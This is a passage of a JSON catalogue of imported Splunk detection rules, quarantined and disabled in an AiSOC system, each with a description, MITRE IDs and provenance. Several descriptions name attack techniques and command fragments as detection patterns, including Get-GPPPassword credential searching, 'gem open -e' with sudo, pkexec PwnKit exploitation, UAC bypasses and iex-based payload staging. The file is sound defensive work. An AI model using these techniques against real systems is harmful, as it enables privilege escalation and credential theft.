Certain premium Office 365 capabilities such as Safe Attachment and Safe Links further enhance these detection and response functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-threat-intelligence-suspicious-file-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00958c7b-35db-4e7a-ad13-31550a7a7c64", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_threat_intelligence_suspicious_file_detected.yml" } }, { "id": "splunk-security-content-00af8f7f-e004-446b-9bba-2732f717ae27", "type": "detection", "name": "ASL AWS EC2 Snapshot Shared Externally", "description": "The following analytic detects when an EC2 snapshot is shared publicly by analyzing AWS CloudTrail events. This detection method leverages CloudTrail logs to identify modifications in snapshot permissions, specifically when the snapshot is shared outside the originating AWS account. This activity is significant as it may indicate an attempt to exfiltrate sensitive data stored in the snapshot. 
If confirmed malicious, an attacker could gain unauthorized access to the snapshot's data, potentially leading to data breaches or further exploitation of the compromised information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-ec2-snapshot-shared-externally.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00af8f7f-e004-446b-9bba-2732f717ae27", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_ec2_snapshot_shared_externally.yml" } }, { "id": "splunk-security-content-00ca7f9e-88ab-4841-a6c2-83979ab1ed29", "type": "detection", "name": "Windows RDP Login Session Was Established", "description": "The following analytic detects instances where a successful Remote Desktop Protocol (RDP) login session was established, as indicated by Windows Security Event ID 4624 with Logon Type 10. This event confirms that a user has not only provided valid credentials but has also initiated a full interactive RDP session. It is a key indicator of successful remote access to a Windows system. 
When correlated with Event ID 1149, which logs RDP authentication success, this analytic helps distinguish between mere credential acceptance and actual session establishment\u2014critical for effective monitoring and threat detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-login-session-was-established.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00ca7f9e-88ab-4841-a6c2-83979ab1ed29", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_login_session_was_established.yml" } }, { "id": "splunk-security-content-00d050d3-a5b4-4565-a6a5-a31f69681dc3", "type": "detection", "name": "Windows UAC Bypass Suspicious Escalation Behavior", "description": "The following analytic detects when a process spawns an executable known for User Account Control (UAC) bypass exploitation and subsequently monitors for any child processes with a higher integrity level than the original process.\nThis detection leverages Sysmon EventID 1 data, focusing on process integrity levels and known UAC bypass executables.\nThis activity is significant as it may indicate an attacker has successfully used a UAC bypass exploit to escalate privileges.\nIf confirmed malicious, the attacker could gain elevated privileges, potentially leading to further system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-uac-bypass-suspicious-escalation-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00d050d3-a5b4-4565-a6a5-a31f69681dc3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml" } }, { "id": "splunk-security-content-00d877c3-7b7b-443d-9562-6b231e2abab9", "type": "detection", "name": "Windows AD AdminSDHolder ACL Modified", "description": "The following analytic detects modifications to the Access Control List (ACL) of the AdminSDHolder object in a Windows domain, specifically the addition of new rules. It leverages EventCode 5136 from the Security Event Log, focusing on changes to the nTSecurityDescriptor attribute. This activity is significant because the AdminSDHolder object secures privileged group members, and unauthorized changes can allow attackers to establish persistence and escalate privileges. 
If confirmed malicious, this could enable an attacker to control domain-level permissions, compromising the entire Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-adminsdholder-acl-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00d877c3-7b7b-443d-9562-6b231e2abab9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_adminsdholder_acl_modified.yml" } }, { "id": "splunk-security-content-0115482a-5dcb-4bb0-bcca-5d095d224236", "type": "detection", "name": "Linux Gem Privilege Escalation", "description": "The following analytic detects the execution of the RubyGems utility with elevated privileges, specifically when it is used to run system commands as root. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include \"gem open -e\" and \"sudo\". This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute commands as the root user. 
If confirmed malicious, this could lead to full system compromise, enabling the attacker to gain root access and execute arbitrary commands with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-gem-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0115482a-5dcb-4bb0-bcca-5d095d224236", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_gem_privilege_escalation.yml" } }, { "id": "splunk-security-content-0130a0df-83a1-4647-9011-841e950ff302", "type": "detection", "name": "Windows PowerSploit GPP Discovery", "description": "The following analytic detects the execution of the Get-GPPPassword PowerShell cmdlet, which is used to search for unsecured credentials in Group Policy Preferences (GPP). This detection leverages PowerShell Script Block Logging to identify specific script block text associated with this cmdlet. Monitoring this activity is crucial as it can indicate an attempt to retrieve and decrypt stored credentials from SYSVOL, potentially leading to unauthorized access. 
If confirmed malicious, this activity could allow an attacker to escalate privileges or move laterally within the network by exploiting exposed credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powersploit-gpp-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0130a0df-83a1-4647-9011-841e950ff302", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powersploit_gpp_discovery.yml" } }, { "id": "splunk-security-content-0175f0b7-728d-4038-bbf1-1c30d6ee3d31", "type": "detection", "name": "Windows WBAdmin File Recovery From Backup", "description": "The following analytic identifies the execution of wbadmin.exe with arguments indicative of restoring files from an existing backup.\nWBAdmin is a legitimate Windows Backup utility used for creating, managing, and restoring backups. 
However, adversaries may abuse it to restore specific files (e.g., sensitive credentials, configuration files, or malware stagers) from prior backups to regain access or re-establish persistence after cleanup or encryption events.\nMonitoring this behavior is important because restoring individual files from a system backup outside of approved recovery workflows may indicate an attacker attempting to retrieve deleted or encrypted data, recover previously dropped payloads, or access prior system states as part of post-compromise activity.\nIf confirmed malicious, this action could enable attackers to regain operational footholds, extract sensitive data, or restore tampered components, undermining remediation and containment efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490", "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wbadmin-file-recovery-from-backup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0175f0b7-728d-4038-bbf1-1c30d6ee3d31", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wbadmin_file_recovery_from_backup.yml" } }, { "id": "splunk-security-content-018c1972-ca07-11eb-9473-acde48001122", "type": "detection", "name": "Recon Using WMI Class", "description": "The following analytic detects suspicious PowerShell activity via EventCode 4104, where WMI performs event queries to gather information on running processes or services. 
This detection leverages PowerShell Script Block Logging to identify specific WMI queries targeting system information classes like Win32_Bios and Win32_OperatingSystem. This activity is significant as it often indicates reconnaissance efforts by an adversary to profile the compromised machine. If confirmed malicious, the attacker could gain detailed system information, aiding in further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/recon-using-wmi-class.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "018c1972-ca07-11eb-9473-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/recon_using_wmi_class.yml" } }, { "id": "splunk-security-content-01a510b3-a6ac-4d50-8812-7e8a3cde3d79", "type": "detection", "name": "O365 FullAccessAsApp Permission Assigned", "description": "The following analytic detects the assignment of the 'full_access_as_app' permission to an application registration in Office 365 Exchange Online. This detection leverages Office 365 management activity logs and filters Azure Active Directory workload events to identify when the specific permission, identified by GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', is granted. This activity is significant because it provides extensive control over Office 365 operations, including access to all mailboxes and the ability to send mail as any user. 
If confirmed malicious, this could lead to unauthorized data access, exfiltration, or account compromise. Immediate investigation is required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002", "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-fullaccessasapp-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "01a510b3-a6ac-4d50-8812-7e8a3cde3d79", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_fullaccessasapp_permission_assigned.yml" } }, { "id": "splunk-security-content-01d29b48-ff6f-11eb-b81e-acde48001123", "type": "detection", "name": "7zip CommandLine To SMB Share Path", "description": "The following analytic detects the execution of 7z or 7za processes with command lines pointing to SMB network shares. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it may indicate an attempt to archive and exfiltrate sensitive files to a network share, a technique observed in CONTI LEAK tools. 
If confirmed malicious, this behavior could lead to data exfiltration, compromising sensitive information and potentially aiding further attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/7zip-commandline-to-smb-share-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "01d29b48-ff6f-11eb-b81e-acde48001123", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/7zip_commandline_to_smb_share_path.yml" } }, { "id": "splunk-security-content-01d9a0c2-cece-11eb-ab46-acde48001122", "type": "detection", "name": "Detect WMI Event Subscription Persistence", "description": "The following analytic identifies the creation of WMI Event Subscriptions, which can be used to establish persistence or perform privilege escalation. It detects EventID 19 (EventFilter creation), EventID 20 (EventConsumer creation), and EventID 21 (FilterToConsumerBinding creation) from Sysmon logs. This activity is significant because WMI Event Subscriptions can execute code with elevated SYSTEM privileges, making it a powerful persistence mechanism. 
If confirmed malicious, an attacker could maintain long-term access, escalate privileges, and execute arbitrary code, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-wmi-event-subscription-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "01d9a0c2-cece-11eb-ab46-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_wmi_event_subscription_persistence.yml" } }, { "id": "splunk-security-content-01f0aef4-8591-4daa-a53d-0ed49823b681", "type": "detection", "name": "Windows Abused Web Services", "description": "The following analytic detects a suspicious process making DNS queries to known, abused web services such as text-paste sites, VoIP, secure tunneling, instant messaging, and digital distribution platforms. This detection leverages Sysmon logs with Event ID 22, focusing on specific query names. This activity is significant as it may indicate an adversary attempting to download malicious files, a common initial access technique. 
If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further compromise of the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-abused-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "01f0aef4-8591-4daa-a53d-0ed49823b681", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_abused_web_services.yml" } }, { "id": "splunk-security-content-023f3452-5f27-11ec-bf00-acde48001122", "type": "detection", "name": "Linux Add Files In Known Crontab Directories", "description": "The following analytic detects unauthorized file creation in known crontab directories on Unix-based systems. It leverages filesystem data to identify new files in directories such as /etc/cron* and /var/spool/cron/*. This activity is significant as it may indicate an attempt by threat actors or malware to establish persistence on a compromised host. 
If confirmed malicious, this could allow attackers to execute arbitrary code at scheduled intervals, potentially leading to further system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-add-files-in-known-crontab-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "023f3452-5f27-11ec-bf00-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_add_files_in_known_crontab_directories.yml" } }, { "id": "splunk-security-content-0247f90a-aca4-47b2-a94d-e30f445d7b41", "type": "detection", "name": "Windows File and Directory Permissions Enable Inheritance", "description": "The following analytic detects the enabling of permission inheritance using ICACLS. This analytic identifies instances where ICACLS commands are used to enable permission inheritance on files or directories. The /inheritance:e flag, which restores inherited permissions from a parent directory, is monitored to detect changes that might reapply broader access control settings. 
Enabling inheritance can indicate legitimate administrative actions but may also signal attempts to override restrictive custom permissions, potentially exposing sensitive files to unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-and-directory-permissions-enable-inheritance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0247f90a-aca4-47b2-a94d-e30f445d7b41", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_and_directory_permissions_enable_inheritance.yml" } }, { "id": "splunk-security-content-0252ca80-e30d-11eb-8aa3-acde48001122", "type": "detection", "name": "NET Profiler UAC bypass", "description": "The following analytic detects modifications to the registry aimed at bypassing the User Account Control (UAC) feature in Windows. It identifies changes to the .NET COR_PROFILER_PATH registry key, which can be exploited to load a malicious DLL via mmc.exe. This detection leverages data from the Endpoint.Registry datamodel, focusing on specific registry paths and values. Monitoring this activity is crucial as it can indicate an attempt to escalate privileges or persist within the environment. 
If confirmed malicious, this could allow an attacker to execute arbitrary code with elevated privileges, compromising system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/net-profiler-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0252ca80-e30d-11eb-8aa3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/net_profiler_uac_bypass.yml" } }, { "id": "splunk-security-content-026f5f4e-e99f-4155-9e63-911ba587300b", "type": "detection", "name": "Windows Defender ASR Block Events", "description": "This detection searches for Windows Defender ASR block events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR block events that are generated when a process or application attempts to perform an action that is blocked by an ASR rule. Typically, these will be enabled in block mode after auditing and tuning the ASR rules themselves. 
Set to TTP once tuned.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-block-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "026f5f4e-e99f-4155-9e63-911ba587300b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_block_events.yml" } }, { "id": "splunk-security-content-0270455b-1385-4579-9ac5-e77046c508ae", "type": "detection", "name": "Windows Proxy Via Registry", "description": "The following analytic detects the modification of registry keys related to the Windows Proxy settings via netsh.exe. It leverages data from the Endpoint.Registry data model, focusing on changes to the registry path \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp*\". This activity is significant because netsh.exe can be used to establish a persistent proxy, potentially allowing an attacker to execute a helper DLL whenever netsh.exe runs. 
If confirmed malicious, this could enable the attacker to maintain persistence, manipulate network configurations, and potentially exfiltrate data or further compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-proxy-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0270455b-1385-4579-9ac5-e77046c508ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_proxy_via_registry.yml" } }, { "id": "splunk-security-content-029d6fe4-a5fe-43af-827e-c78c50e81d81", "type": "detection", "name": "Zeek x509 Certificate with Punycode", "description": "The following analytic detects the presence of punycode within x509 certificates using Zeek x509 logs. It identifies punycode in the subject alternative name email and other fields by searching for the \"xn--\" prefix. This activity is significant as punycode can be used in phishing attacks or to bypass domain filters, posing a security risk. 
If confirmed malicious, attackers could use these certificates to impersonate legitimate domains, potentially leading to unauthorized access or data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zeek-x509-certificate-with-punycode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "029d6fe4-a5fe-43af-827e-c78c50e81d81", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/zeek_x509_certificate_with_punycode.yml" } }, { "id": "splunk-security-content-02c1d8e9-044c-401f-906c-cc95445af8bd", "type": "detection", "name": "PowerShell Environment Variable Execution", "description": "The following analytic detects the execution of PowerShell scripts that combine environment variable access (`$env:` or `[Environment]::SetEnvironmentVariable`) with `Invoke-Expression` or its alias `iex` to dynamically construct and run code at runtime. This technique is commonly used by adversaries to stage and execute payloads by embedding commands or encoded content inside environment variables, then evaluating them on the fly \u2014 effectively hiding the true execution intent from static inspection. Detection is based on PowerShell Script Block Logging (Event ID 4104), which captures the de-obfuscated script block before it executes. 
Triggering this analytic indicates a potential attempt to execute environment-variable-stored code, a behavior observed in malware loaders and stagers, including those associated with the VIP Keylogger campaign.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-environment-variable-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "02c1d8e9-044c-401f-906c-cc95445af8bd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_environment_variable_execution.yml" } }, { "id": "splunk-security-content-02c6cfc2-ae66-4735-bfc7-6291da834cbf", "type": "detection", "name": "File with Samsam Extension", "description": "The following analytic detects file writes with extensions indicative of a SamSam ransomware attack.\nIt leverages file-system activity data to identify file names ending in .stubbin, .berkshire, .satoshi, .sophos, or .keyxml.\nThis activity is significant because SamSam ransomware is highly destructive, leading to file encryption and ransom demands.\nIf confirmed malicious, the impact includes significant financial losses, operational disruptions, and reputational damage.\nImmediate actions should include isolating affected systems, restoring files from backups, and investigating the attack source to prevent further incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/file-with-samsam-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "02c6cfc2-ae66-4735-bfc7-6291da834cbf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/file_with_samsam_extension.yml" } }, { "id": "splunk-security-content-03b2b286-fa86-4ec9-b1a1-ec19d314bdf7", "type": "detection", "name": "Linux Docker Shell Execution", "description": "This detection identifies shell execution activity associated with Docker containers on Linux systems.\nSpecifically, it monitors for interactive or non-interactive shell processes (e.g., `/bin/bash`, `/bin/sh`, `/bin/zsh`) launched via Docker commands such as `docker exec`, or through container entrypoint overrides.\nShell execution inside a container may indicate administrative troubleshooting activity.\nHowever, it can also represent post-exploitation behavior, where an attacker gains access to a container and spawns a shell to execute arbitrary commands, establish persistence, or pivot to the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.013" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-docker-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", 
"source_id": "03b2b286-fa86-4ec9-b1a1-ec19d314bdf7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_docker_shell_execution.yml" } }, { "id": "splunk-security-content-03cdd68a-34fb-11ec-9bd3-acde48001122", "type": "detection", "name": "Gsuite suspicious calendar invite", "description": "The following analytic detects suspicious calendar invites sent via GSuite, potentially indicating compromised accounts or malicious internal activity. It leverages GSuite calendar logs, focusing on events where a high volume of invites (over 100) is sent within a 5-minute window. This behavior is significant as it may involve the distribution of malicious links or attachments, posing a security risk. If confirmed malicious, this activity could lead to widespread phishing attacks, unauthorized access, or malware distribution within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-suspicious-calendar-invite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "03cdd68a-34fb-11ec-9bd3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_suspicious_calendar_invite.yml" } }, { "id": "splunk-security-content-03e22c1c-8086-11ec-ac2e-acde48001122", "type": "detection", "name": "Linux pkexec Privilege Escalation", "description": "The 
following analytic detects the execution of `pkexec` without any command-line arguments. This behavior leverages data from Endpoint Detection and Response (EDR) agents, focusing on process telemetry. The significance lies in the fact that this pattern is associated with the exploitation of CVE-2021-4034 (PwnKit), a critical vulnerability in Polkit's pkexec component. If confirmed malicious, this activity could allow an attacker to gain full root privileges on the affected Linux system, leading to complete system compromise and potential unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-pkexec-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "03e22c1c-8086-11ec-ac2e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_pkexec_privilege_escalation.yml" } }, { "id": "splunk-security-content-04023928-0381-4935-82cb-03372b2ef644", "type": "detection", "name": "Windows ScManager Security Descriptor Tampering Via Sc.EXE", "description": "The following analytic detects changes in the ScManager service security descriptor settings. It leverages data from Endpoint Detection and Response (EDR) 